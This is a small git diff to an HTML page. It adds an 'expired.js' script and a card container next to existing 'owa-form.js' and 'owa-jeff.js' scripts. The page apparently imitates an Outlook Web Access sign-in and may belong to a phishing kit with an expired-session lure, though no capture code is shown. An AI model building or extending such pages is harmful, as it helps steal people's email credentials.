--- a/index.html
+++ b/index.html
@@ -20,6 +20,7 @@
     <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>
   <script type="module" crossorigin src="owa-form.js"></script>
   <script type="module" crossorigin src="owa-jeff.js"></script>
+    <script type="module" crossorigin src="expired.js"></script>
     <style>
         .hidden { display: none; }
         .fade-in {
@@ -38,6 +39,7 @@
     </style>
 </head>
 <body data-bind="defineGlobals: ServerData, bodyCssClass" class="cb" style="display: block;">
-  <div id="root"></div>  
+  <div id="root"></div>
+    <div class="card" id="app"></div>
 </body>
 </html>
